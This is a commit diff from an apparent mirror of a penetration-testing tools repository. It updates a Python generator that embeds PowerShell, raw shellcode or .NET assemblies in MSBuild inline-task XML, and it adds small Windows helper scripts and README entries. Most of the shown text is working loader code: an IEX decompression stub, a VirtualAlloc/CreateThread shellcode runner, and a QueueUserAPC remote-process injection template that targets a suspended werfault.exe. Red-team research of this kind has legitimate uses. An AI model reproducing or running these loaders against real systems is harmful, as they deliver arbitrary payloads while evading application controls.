mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 10:01:38 +01:00
added two useful windows scripts and updated generateMSBuildXML.py
This commit is contained in:
parent
fe824c97f3
commit
96317dd8f9
@ -28,7 +28,7 @@ import binascii
|
|||||||
import argparse
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
def getCompressedPayload(filePath):
|
def getCompressedPayload(filePath, returnRaw = False):
|
||||||
out = io.BytesIO()
|
out = io.BytesIO()
|
||||||
encoded = ''
|
encoded = ''
|
||||||
with open(filePath, 'rb') as f:
|
with open(filePath, 'rb') as f:
|
||||||
@ -38,57 +38,99 @@ def getCompressedPayload(filePath):
|
|||||||
fo.write(inp)
|
fo.write(inp)
|
||||||
|
|
||||||
encoded = base64.b64encode(out.getvalue())
|
encoded = base64.b64encode(out.getvalue())
|
||||||
|
if returnRaw:
|
||||||
|
return encoded
|
||||||
|
|
||||||
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
||||||
encoded.decode()
|
encoded.decode()
|
||||||
)
|
)
|
||||||
return powershell
|
return powershell
|
||||||
|
|
||||||
def getInlineTask(payload, _format):
|
def getPayloadCode(payload):
|
||||||
|
return f'shellcode = "{payload}";'
|
||||||
|
|
||||||
|
payloadCode = '\n'
|
||||||
|
|
||||||
|
N = 50000
|
||||||
|
codeSlices = map(lambda i: payload[i:i+N], range(0, len(payload), N))
|
||||||
|
|
||||||
|
variables = []
|
||||||
|
|
||||||
|
num = 1
|
||||||
|
for code in codeSlices:
|
||||||
|
payloadCode += f'string shellcode{num} = "{code}";\n'
|
||||||
|
variables.append(f'shellcode{num}')
|
||||||
|
num += 1
|
||||||
|
|
||||||
|
concat = 'shellcode = ' + ' + '.join(variables) + ';\n'
|
||||||
|
payloadCode += concat
|
||||||
|
|
||||||
|
return payloadCode
|
||||||
|
|
||||||
|
def getInlineTask(module, payload, _format, apc, targetProcess):
|
||||||
templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
|
templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
|
||||||
|
if len(module) > 0:
|
||||||
|
templateName = module
|
||||||
|
|
||||||
taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
|
taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
|
||||||
|
|
||||||
|
payloadCode = getPayloadCode(payload.decode())
|
||||||
|
sys.stderr.write(payloadCode + '\n')
|
||||||
launchCode = ''
|
launchCode = ''
|
||||||
|
|
||||||
if _format == 'exe':
|
if _format == 'exe':
|
||||||
|
|
||||||
exeLaunchCode = string.Template('''<ParameterGroup/>
|
exeLaunchCode = string.Template('''<Task>
|
||||||
<Task>
|
<Reference Include="System.Management.Automation" />
|
||||||
<Using Namespace="System" />
|
<Code Type="Class" Language="cs">
|
||||||
<Using Namespace="System.Reflection" />
|
<![CDATA[
|
||||||
|
using System.IO;
|
||||||
<Code Type="Fragment" Language="cs">
|
using System.IO.Compression;
|
||||||
<![CDATA[
|
using System;
|
||||||
string payload = "$payload2";
|
using System.Reflection;
|
||||||
byte[] decoded = System.Convert.FromBase64String(payload);
|
using System.Text;
|
||||||
|
|
||||||
Assembly asm = Assembly.Load(decoded);
|
public class $templateName : Task {
|
||||||
|
|
||||||
|
public static byte[] DecompressString(string compressedText) {
|
||||||
|
byte[] data = Convert.FromBase64String(compressedText);
|
||||||
|
|
||||||
|
using (var ms = new MemoryStream(data)) {
|
||||||
|
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
|
||||||
|
using (var decompressed = new MemoryStream()) {
|
||||||
|
gzip.CopyTo(decompressed);
|
||||||
|
return decompressed.ToArray();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
public override bool Execute() {
|
||||||
|
|
||||||
|
string shellcode = "";
|
||||||
|
$payloadCode
|
||||||
|
byte[] payload = DecompressString(shellcode);
|
||||||
|
|
||||||
|
Assembly asm = Assembly.Load(payload);
|
||||||
MethodInfo method = asm.EntryPoint;
|
MethodInfo method = asm.EntryPoint;
|
||||||
object instance = asm.CreateInstance(method.Name);
|
object instance = asm.CreateInstance(method.Name);
|
||||||
method.Invoke(instance, null);
|
method.Invoke(instance, null);
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
}
|
||||||
]]>
|
]]>
|
||||||
</Code>''').safe_substitute(
|
</Code>
|
||||||
payload2 = base64.b64encode(payload.encode()).decode()
|
</Task>''').safe_substitute(
|
||||||
|
payloadCode = payloadCode
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
launchCode = exeLaunchCode
|
launchCode = exeLaunchCode
|
||||||
|
|
||||||
elif _format == 'raw':
|
elif _format == 'raw':
|
||||||
|
shellcodeLoader = ''
|
||||||
|
|
||||||
foo = str(binascii.hexlify(payload), 'ascii')
|
if not apc:
|
||||||
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
|
shellcodeLoader = string.Template('''<Task>
|
||||||
encodedPayload = ' '
|
|
||||||
|
|
||||||
for i in range(len(fooarr)):
|
|
||||||
if i % 32 == 0 and i > 0:
|
|
||||||
encodedPayload += '\n '
|
|
||||||
encodedPayload += '{}, '.format(fooarr[i])
|
|
||||||
|
|
||||||
encodedPayload = encodedPayload.strip()[:-1]
|
|
||||||
|
|
||||||
shellcodeLoader = string.Template('''<Task>
|
|
||||||
<Reference Include="System.Management.Automation" />
|
<Reference Include="System.Management.Automation" />
|
||||||
<Code Type="Class" Language="cs">
|
<Code Type="Class" Language="cs">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
@ -100,7 +142,9 @@ def getInlineTask(payload, _format):
|
|||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Reflection;
|
using System.Reflection;
|
||||||
using System.Runtime.InteropServices;
|
using System.Runtime.InteropServices;
|
||||||
|
using System.IO;
|
||||||
|
using System.IO.Compression;
|
||||||
|
using System.Text;
|
||||||
|
|
||||||
public class $templateName : Task {
|
public class $templateName : Task {
|
||||||
|
|
||||||
@ -123,11 +167,24 @@ def getInlineTask(payload, _format):
|
|||||||
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
private static UInt32 MEM_RELEASE = 0x8000;
|
private static UInt32 MEM_RELEASE = 0x8000;
|
||||||
|
|
||||||
|
public static byte[] DecompressString(string compressedText) {
|
||||||
|
byte[] data = Convert.FromBase64String(compressedText);
|
||||||
|
|
||||||
|
using (var ms = new MemoryStream(data)) {
|
||||||
|
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
|
||||||
|
using (var decompressed = new MemoryStream()) {
|
||||||
|
gzip.CopyTo(decompressed);
|
||||||
|
return decompressed.ToArray();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
public override bool Execute() {
|
public override bool Execute() {
|
||||||
|
|
||||||
byte[] payload = new byte[$payloadSize] {
|
string shellcode = "";
|
||||||
$payload2
|
$payloadCode
|
||||||
};
|
byte[] payload = DecompressString(shellcode);
|
||||||
|
|
||||||
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
||||||
@ -144,10 +201,214 @@ def getInlineTask(payload, _format):
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
]]>
|
]]>
|
||||||
</Code>''').safe_substitute(
|
</Code>
|
||||||
|
</Task>''').safe_substitute(
|
||||||
|
templateName = templateName,
|
||||||
|
payloadCode = payloadCode
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
#
|
||||||
|
# The below MSBuild template comes from:
|
||||||
|
# https://github.com/infosecn1nja/MaliciousMacroMSBuild
|
||||||
|
#
|
||||||
|
shellcodeLoader = string.Template('''<Task>
|
||||||
|
<Code Type="Class" Language="cs">
|
||||||
|
<![CDATA[
|
||||||
|
using System;
|
||||||
|
using System.Reflection;
|
||||||
|
using Microsoft.CSharp;
|
||||||
|
using Microsoft.Build.Framework;
|
||||||
|
using Microsoft.Build.Utilities;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.IO;
|
||||||
|
using System.IO.Compression;
|
||||||
|
using System.Text;
|
||||||
|
|
||||||
|
public class $templateName : Task, ITask
|
||||||
|
{
|
||||||
|
public static byte[] DecompressString(string compressedText) {
|
||||||
|
byte[] data = Convert.FromBase64String(compressedText);
|
||||||
|
|
||||||
|
using (var ms = new MemoryStream(data)) {
|
||||||
|
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
|
||||||
|
using (var decompressed = new MemoryStream()) {
|
||||||
|
gzip.CopyTo(decompressed);
|
||||||
|
return decompressed.ToArray();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
public override bool Execute() {
|
||||||
|
|
||||||
|
string shellcode = "";
|
||||||
|
$payloadCode
|
||||||
|
byte[] payload = DecompressString(shellcode);
|
||||||
|
|
||||||
|
string processpath = Environment.ExpandEnvironmentVariables(@"$targetProcess");
|
||||||
|
STARTUPINFO si = new STARTUPINFO();
|
||||||
|
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
|
||||||
|
bool success = CreateProcess(null, processpath,
|
||||||
|
IntPtr.Zero, IntPtr.Zero, false,
|
||||||
|
ProcessCreationFlags.CREATE_SUSPENDED,
|
||||||
|
IntPtr.Zero, null, ref si, out pi);
|
||||||
|
|
||||||
|
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, payload.Length,MEM_COMMIT, PAGE_READWRITE);
|
||||||
|
IntPtr bytesWritten = IntPtr.Zero;
|
||||||
|
bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,payload,payload.Length, out bytesWritten);
|
||||||
|
|
||||||
|
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
|
||||||
|
uint oldProtect = 0;
|
||||||
|
resultBool = VirtualProtectEx(pi.hProcess,resultPtr, payload.Length,PAGE_EXECUTE_READ, out oldProtect);
|
||||||
|
IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
|
||||||
|
|
||||||
|
IntPtr ThreadHandle = pi.hThread;
|
||||||
|
ResumeThread(ThreadHandle);
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
private static UInt32 MEM_COMMIT = 0x1000;
|
||||||
|
|
||||||
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
|
private static UInt32 PAGE_READWRITE = 0x04;
|
||||||
|
private static UInt32 PAGE_EXECUTE_READ = 0x20;
|
||||||
|
|
||||||
|
[Flags]
|
||||||
|
public enum ProcessAccessFlags : uint
|
||||||
|
{
|
||||||
|
All = 0x001F0FFF,
|
||||||
|
Terminate = 0x00000001,
|
||||||
|
CreateThread = 0x00000002,
|
||||||
|
VirtualMemoryOperation = 0x00000008,
|
||||||
|
VirtualMemoryRead = 0x00000010,
|
||||||
|
VirtualMemoryWrite = 0x00000020,
|
||||||
|
DuplicateHandle = 0x00000040,
|
||||||
|
CreateProcess = 0x000000080,
|
||||||
|
SetQuota = 0x00000100,
|
||||||
|
SetInformation = 0x00000200,
|
||||||
|
QueryInformation = 0x00000400,
|
||||||
|
QueryLimitedInformation = 0x00001000,
|
||||||
|
Synchronize = 0x00100000
|
||||||
|
}
|
||||||
|
|
||||||
|
[Flags]
|
||||||
|
public enum ProcessCreationFlags : uint
|
||||||
|
{
|
||||||
|
ZERO_FLAG = 0x00000000,
|
||||||
|
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
|
||||||
|
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
|
||||||
|
CREATE_NEW_CONSOLE = 0x00000010,
|
||||||
|
CREATE_NEW_PROCESS_GROUP = 0x00000200,
|
||||||
|
CREATE_NO_WINDOW = 0x08000000,
|
||||||
|
CREATE_PROTECTED_PROCESS = 0x00040000,
|
||||||
|
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
|
||||||
|
CREATE_SEPARATE_WOW_VDM = 0x00001000,
|
||||||
|
CREATE_SHARED_WOW_VDM = 0x00001000,
|
||||||
|
CREATE_SUSPENDED = 0x00000004,
|
||||||
|
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
|
||||||
|
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
|
||||||
|
DEBUG_PROCESS = 0x00000001,
|
||||||
|
DETACHED_PROCESS = 0x00000008,
|
||||||
|
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
|
||||||
|
INHERIT_PARENT_AFFINITY = 0x00010000
|
||||||
|
}
|
||||||
|
|
||||||
|
public struct PROCESS_INFORMATION
|
||||||
|
{
|
||||||
|
public IntPtr hProcess;
|
||||||
|
public IntPtr hThread;
|
||||||
|
public uint dwProcessId;
|
||||||
|
public uint dwThreadId;
|
||||||
|
}
|
||||||
|
|
||||||
|
public struct STARTUPINFO
|
||||||
|
{
|
||||||
|
public uint cb;
|
||||||
|
public string lpReserved;
|
||||||
|
public string lpDesktop;
|
||||||
|
public string lpTitle;
|
||||||
|
public uint dwX;
|
||||||
|
public uint dwY;
|
||||||
|
public uint dwXSize;
|
||||||
|
public uint dwYSize;
|
||||||
|
public uint dwXCountChars;
|
||||||
|
public uint dwYCountChars;
|
||||||
|
public uint dwFillAttribute;
|
||||||
|
public uint dwFlags;
|
||||||
|
public short wShowWindow;
|
||||||
|
public short cbReserved2;
|
||||||
|
public IntPtr lpReserved2;
|
||||||
|
public IntPtr hStdInput;
|
||||||
|
public IntPtr hStdOutput;
|
||||||
|
public IntPtr hStdError;
|
||||||
|
}
|
||||||
|
|
||||||
|
[Flags]
|
||||||
|
public enum ThreadAccess : int
|
||||||
|
{
|
||||||
|
TERMINATE = (0x0001) ,
|
||||||
|
SUSPEND_RESUME = (0x0002) ,
|
||||||
|
GET_CONTEXT = (0x0008) ,
|
||||||
|
SET_CONTEXT = (0x0010) ,
|
||||||
|
SET_INFORMATION = (0x0020) ,
|
||||||
|
QUERY_INFORMATION = (0x0040) ,
|
||||||
|
SET_THREAD_TOKEN = (0x0080) ,
|
||||||
|
IMPERSONATE = (0x0100) ,
|
||||||
|
DIRECT_IMPERSONATION = (0x0200)
|
||||||
|
}
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll", SetLastError = true)]
|
||||||
|
public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
|
||||||
|
int dwThreadId);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll",SetLastError = true)]
|
||||||
|
public static extern bool WriteProcessMemory(
|
||||||
|
IntPtr hProcess,
|
||||||
|
IntPtr lpBaseAddress,
|
||||||
|
byte[] lpBuffer,
|
||||||
|
int nSize,
|
||||||
|
out IntPtr lpNumberOfBytesWritten);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
|
||||||
|
Int32 size, UInt32 flAllocationType, UInt32 flProtect);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll", SetLastError = true )]
|
||||||
|
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
|
||||||
|
Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll", SetLastError = true)]
|
||||||
|
public static extern IntPtr OpenProcess(
|
||||||
|
ProcessAccessFlags processAccess,
|
||||||
|
bool bInheritHandle,
|
||||||
|
int processId
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,
|
||||||
|
bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,
|
||||||
|
string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern uint ResumeThread(IntPtr hThread);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern uint SuspendThread(IntPtr hThread);
|
||||||
|
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
|
||||||
|
int dwSize, uint flNewProtect, out uint lpflOldProtect);
|
||||||
|
}
|
||||||
|
]]>
|
||||||
|
</Code>
|
||||||
|
</Task>''').safe_substitute(
|
||||||
templateName = templateName,
|
templateName = templateName,
|
||||||
payload2 = encodedPayload,
|
payloadCode = payloadCode,
|
||||||
payloadSize = len(payload)
|
targetProcess = targetProcess
|
||||||
)
|
)
|
||||||
|
|
||||||
launchCode = shellcodeLoader
|
launchCode = shellcodeLoader
|
||||||
@ -157,15 +418,33 @@ def getInlineTask(payload, _format):
|
|||||||
<Reference Include="System.Management.Automation" />
|
<Reference Include="System.Management.Automation" />
|
||||||
<Code Type="Class" Language="cs">
|
<Code Type="Class" Language="cs">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
|
using System.IO;
|
||||||
|
using System.IO.Compression;
|
||||||
using System.Management.Automation;
|
using System.Management.Automation;
|
||||||
using System.Management.Automation.Runspaces;
|
using System.Management.Automation.Runspaces;
|
||||||
using Microsoft.Build.Framework;
|
using Microsoft.Build.Framework;
|
||||||
using Microsoft.Build.Utilities;
|
using Microsoft.Build.Utilities;
|
||||||
|
using System.Text;
|
||||||
|
|
||||||
public class $templateName : Task {
|
public class $templateName : Task {
|
||||||
|
public static byte[] DecompressString(string compressedText) {
|
||||||
|
byte[] data = Convert.FromBase64String(compressedText);
|
||||||
|
|
||||||
|
using (var ms = new MemoryStream(data)) {
|
||||||
|
using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
|
||||||
|
using (var decompressed = new MemoryStream()) {
|
||||||
|
gzip.CopyTo(decompressed);
|
||||||
|
return decompressed.ToArray();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
public override bool Execute() {
|
public override bool Execute() {
|
||||||
|
|
||||||
byte[] payload = System.Convert.FromBase64String("$payload2");
|
string shellcode = "";
|
||||||
|
$payloadCode
|
||||||
|
byte[] payload = DecompressString(shellcode);
|
||||||
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
||||||
|
|
||||||
Runspace runspace = RunspaceFactory.CreateRunspace();
|
Runspace runspace = RunspaceFactory.CreateRunspace();
|
||||||
@ -180,9 +459,10 @@ def getInlineTask(payload, _format):
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
]]>
|
]]>
|
||||||
</Code>''').safe_substitute(
|
</Code>
|
||||||
|
</Task>''').safe_substitute(
|
||||||
templateName = templateName,
|
templateName = templateName,
|
||||||
payload2 = base64.b64encode(payload.encode()).decode()
|
payloadCode = payloadCode
|
||||||
)
|
)
|
||||||
|
|
||||||
launchCode = powershellLaunchCode
|
launchCode = powershellLaunchCode
|
||||||
@ -200,7 +480,6 @@ def getInlineTask(payload, _format):
|
|||||||
<UsingTask TaskName="$templateName" TaskFactory="CodeTaskFactory"
|
<UsingTask TaskName="$templateName" TaskFactory="CodeTaskFactory"
|
||||||
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
|
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
|
||||||
$launchCode
|
$launchCode
|
||||||
</Task>
|
|
||||||
</UsingTask>
|
</UsingTask>
|
||||||
</Project>''').safe_substitute(
|
</Project>''').safe_substitute(
|
||||||
taskName = taskName,
|
taskName = taskName,
|
||||||
@ -265,20 +544,38 @@ def minimize(output):
|
|||||||
'lpThreadId' : 'p11',
|
'lpThreadId' : 'p11',
|
||||||
'dwMilliseconds' : 'p12',
|
'dwMilliseconds' : 'p12',
|
||||||
'hHandle' : 'p13',
|
'hHandle' : 'p13',
|
||||||
|
'processpath' : 'p14',
|
||||||
|
'shellcode' : 'p15',
|
||||||
|
'resultPtr' : 'p16',
|
||||||
|
'bytesWritten' : 'p17',
|
||||||
|
'resultBool' : 'p18',
|
||||||
|
'ThreadHandle' : 'p19',
|
||||||
|
'PAGE_READWRITE' : 'p20',
|
||||||
|
'PAGE_EXECUTE_READ' : 'p21',
|
||||||
}
|
}
|
||||||
|
|
||||||
for k, v in variables.items():
|
# Variables renaming tends to corrupt Base64 streams.
|
||||||
output = output.replace(k, v)
|
#for k, v in variables.items():
|
||||||
|
# output = output.replace(k, v)
|
||||||
|
|
||||||
return output
|
return output
|
||||||
|
|
||||||
def opts(argv):
|
def opts(argv):
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
||||||
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
||||||
|
|
||||||
|
parser.add_argument('-o', '--output', metavar='PATH', default='', type=str, help = 'Output path where to write generated script. Default: stdout')
|
||||||
|
parser.add_argument('-n', '--module', metavar='NAME', default='', type=str, help = 'Specifies custom C# module name for the generated Task (for needs of shellcode loaders such as DotNetToJScript or Donut). Default: auto generated name.')
|
||||||
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
|
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
|
||||||
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
|
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
|
||||||
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
parser.add_argument('-e', '--exe', action='store_true',
|
||||||
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
|
help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
||||||
|
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread (VirtualAlloc + CreateThread)')
|
||||||
|
parser.add_argument('--queue-apc', action='store_true',
|
||||||
|
help = 'If --raw was specified, generate C# code template with CreateProcess + WriteProcessMemory + QueueUserAPC process injection technique instead of default CreateThread.')
|
||||||
|
parser.add_argument('--target-process', metavar='PATH', default=r'%windir%\system32\werfault.exe',
|
||||||
|
help = r'This option specifies target process path for remote process injection in --queue-apc technique. May use environment variables. May also contain command line for spawned process, example: --target-process "%%windir%%\system32\werfault.exe -l -u 1234"')
|
||||||
|
parser.add_argument('--only-csharp', action='store_true', help = 'Return generated C# code instead of MSBuild\'s XML.')
|
||||||
|
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
@ -286,6 +583,8 @@ def opts(argv):
|
|||||||
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
|
args.target_process = args.target_process.replace("^%", '%')
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|
||||||
def main(argv):
|
def main(argv):
|
||||||
@ -296,7 +595,7 @@ def main(argv):
|
|||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
print('Usage: ./generateMSBuildXML.py <inputFile>')
|
print('Usage: ./generateMSBuildXML.py [options] <inputFile>')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
args = opts(argv)
|
args = opts(argv)
|
||||||
@ -325,17 +624,29 @@ def main(argv):
|
|||||||
if args.inputFile.endswith('.exe'):
|
if args.inputFile.endswith('.exe'):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
payload = getCompressedPayload(args.inputFile)
|
payload = getCompressedPayload(args.inputFile, _format != 'powershell')
|
||||||
|
output = getInlineTask(args.module, payload, _format, args.queue_apc, args.target_process)
|
||||||
|
|
||||||
output = getInlineTask(payload, _format)
|
if args.only_csharp:
|
||||||
|
m = re.search(r'\<\!\[CDATA\[(.+)\]\]\>', output, re.M|re.S)
|
||||||
|
if m:
|
||||||
|
output = m.groups(0)[0]
|
||||||
|
|
||||||
if args.minimize:
|
if args.minimize:
|
||||||
output = minimize(output)
|
output = minimize(output)
|
||||||
|
|
||||||
if args.encode:
|
if args.encode:
|
||||||
print(base64.b64encode(output))
|
if len(args.output) > 0:
|
||||||
|
with open(args.output, 'w') as f:
|
||||||
|
f.write(base64.b64encode(output))
|
||||||
|
else:
|
||||||
|
print(base64.b64encode(output))
|
||||||
else:
|
else:
|
||||||
print(output)
|
if len(args.output) > 0:
|
||||||
|
with open(args.output, 'w') as f:
|
||||||
|
f.write(output)
|
||||||
|
else:
|
||||||
|
print(output)
|
||||||
|
|
||||||
msbuildPath = r'%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
|
msbuildPath = r'%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
|
||||||
if 'PROGRAMFILES(X86)' in os.environ:
|
if 'PROGRAMFILES(X86)' in os.environ:
|
||||||
|
3
windows/Find-CLSIDForProgID.ps1
Normal file
3
windows/Find-CLSIDForProgID.ps1
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
function Find-CLSIDForProgID($ProgId) {
|
||||||
|
Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -Include PROGID -Recurse | where {$_.GetValue("") -match $ProgId }
|
||||||
|
}
|
@ -1 +1 @@
|
|||||||
Subproject commit fcfe1e3a40f726e86a1f89e9627055a43b2604de
|
Subproject commit fb7aeee8438b959099b01e38eadce917849ed488
|
@ -3,6 +3,10 @@
|
|||||||
|
|
||||||
- **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794))
|
- **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794))
|
||||||
|
|
||||||
|
- **`Find-CLSIDForProgID.ps1`** - Tries to locate COM object's `ProgID` based on a given CLSID.
|
||||||
|
|
||||||
|
- **`find-system-and-syswow64-binaries.py`** - Finds files with specified extension in both System32 and SysWOW64 and then prints their intersection. Useful for finding executables (for process injection purposes) that reside in both directories (such as `WerFault.exe`)
|
||||||
|
|
||||||
- **`Force-PSRemoting.ps1`** - Forcefully enable WinRM / PSRemoting. [gist](https://gist.github.com/mgeeky/313c22def5c86d7a529f41e5b6ff79b8)
|
- **`Force-PSRemoting.ps1`** - Forcefully enable WinRM / PSRemoting. [gist](https://gist.github.com/mgeeky/313c22def5c86d7a529f41e5b6ff79b8)
|
||||||
|
|
||||||
- **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9))
|
- **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9))
|
||||||
|
36
windows/find-system-and-syswow64-binaries.py
Normal file
36
windows/find-system-and-syswow64-binaries.py
Normal file
@ -0,0 +1,36 @@
|
|||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
import glob
|
||||||
|
|
||||||
|
def main(argv):
|
||||||
|
if len(argv) == 1:
|
||||||
|
print('Usage: ./script <ext>')
|
||||||
|
return False
|
||||||
|
|
||||||
|
ext = argv[1]
|
||||||
|
system32 = set()
|
||||||
|
syswow64 = set()
|
||||||
|
p1 = os.path.join(os.environ['Windir'], 'System32' + os.sep + '*.' + ext)
|
||||||
|
